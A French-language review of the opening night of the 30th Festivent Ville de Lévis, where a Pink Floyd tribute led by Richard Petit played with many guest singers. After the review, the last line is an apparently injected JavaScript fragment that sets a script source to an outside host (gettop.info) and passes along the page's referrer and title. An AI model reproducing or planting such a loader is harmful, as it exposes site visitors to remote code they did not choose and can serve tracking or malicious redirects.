FESTIVENT VILLE DE LÉVIS a bel et bien pris son envol hier pour une 30e édition. Une température humide mais tout de même confortable nous attendait sur le site. Ces nombreux adeptes équipés de chaises pliantes ou de couvertures et manteaux pour mettre sous leurs fesses ne craignaient nullement la pluie et les risques d’orages.

Dès 21h30, LES VICKING THE WALL ont pris possession de la scène. Cette formation qui se veut être un projet musical crée par le chanteur Richard Petit et ses complices Michel Bruno et Blacky, a littéralement fait vibrer la foule avec leurs interprétations des nombreux succès de Pink Floyd.

Tour à tour, Bruno Pelletier, Marc Déry, Martin Deschamps, Alexandre Désilets, Martin Giroux, Sophie Vaillancourt, Eva Avila, Marie-Denise Pelletier et Bilal Butt sont montés sur scène afin de partager leurs amours et leurs passions pour cette musique qui fait partie du coeur des québécois. Et ce n’est que pour nommer ceux-là. Nous avons eu droit à un » Another Break In The Wall » toujours aussi attendu et adoré, un »Hey You » très solide et convaincant sans oublier » Run like hell » qu’on espérait tant et qui a été rendu plus que bien. Bien entendu, c’est sans parler de tous ces autres succès qui nécessitent une dextérité irréprochable. Richard Petit a également délaissé sa guitare électrique pour le micro afin de prendre part à cette représentation éblouissante et complètement impressionnante. En terminant, c’est avec une grande fièreté que ce dernier nous a présenté chacun des artistes qui ont pris part à ce spectacle haut en émotions et en délices pour les yeux et les oreilles. Un véritable plaisir pour tous les malchanceux qui auront été incapable de se procurer des billets pour Roger Waters.

Nul doute que cette brochette d’artistes aura sû satisfaire les attentes de cette première soirée de festivité de cette 30e édition de FESTIVENT VILLE DE LÉVIS. En espérant que les spectacles offerts pour les 4 autres soirées sauront nous jeter à terre tout autant.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;